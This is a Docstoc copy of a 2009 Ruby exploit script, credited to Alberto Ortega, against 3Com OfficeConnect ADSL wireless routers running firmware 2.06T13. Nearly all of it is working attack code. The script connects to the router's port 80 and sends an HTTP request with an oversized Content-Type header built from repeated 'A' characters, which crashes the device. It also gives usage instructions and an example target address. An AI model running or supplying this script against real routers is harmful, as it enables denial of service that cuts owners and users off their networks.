Docstoc

3Com OfficeConnect Routers DoS ContentType

Document Sample
3Com OfficeConnect Routers DoS ContentType Powered By Docstoc
					                                     3Com OfficeConnect Routers DoS ContentType                                    Page 1/1
   1   ###############
   2   # Model −> Tested on 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A−72 and 3CRWDR100Y−72
   3   # Software Version −> Tested on 2.06T13 (Apr 2007, last version for these routers)
   4   # Attacker −> Tested from GNU/Linux (Sidux and Ubuntu) and Windows 7
   5   #
   6   # Exploit languaje −> Ruby
   7   # Type −> Remote Denial of Service Exploit by HTTP
   8   #
   9   # Additional info:
  10   # − The bug can be exploited with Tamper Data (Firefox Addon) too, LOL.
  11   #
  12   ###############
  13   # Discovered and written by Alberto Ortega
  14   # http://pentbox.net/
  15   ###############
  16
  17   require "socket"
  18
  19   host = ARGV[0]
  20   buffer = "A"
  21   send = ""
  22
  23   puts ""
  24   if !host
  25             puts    " 3Com OfficeConnect ADSL Wireless 11g Firewall Router"
  26             puts    " Remote DoS Exploit by HTTP"
  27             puts    " −−−−−− Usage −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−"
  28             puts    " ruby 3com_dosexploit.rb host"
  29             puts    " Ex: ruby 3com_dosexploit.rb 192.168.1.1"
  30   else
  31             begin
  32                        socket = TCPSocket.new(host, 80)
  33                        puts "− Exploiting ..."
  34                        # 8.times is enough to DoS
  35                        9.times do
  36                                 buffer = "#{buffer}#{buffer}"
  37                        end
  38                        # Here are the HTTP packet, Content−Type value causes the DoS
  39                        send = "GET / HTTP/1.1\r\nContent−Type:#{buffer}\r\n"
  40                        socket.write(send)
  41                        puts "− Successfully! :)"
  42             rescue
  43                        puts "Connection problem"
  44             end
  45   end
  46   puts ""




Alberto Ortega                                                                                                     12/21/2009

				
DOCUMENT INFO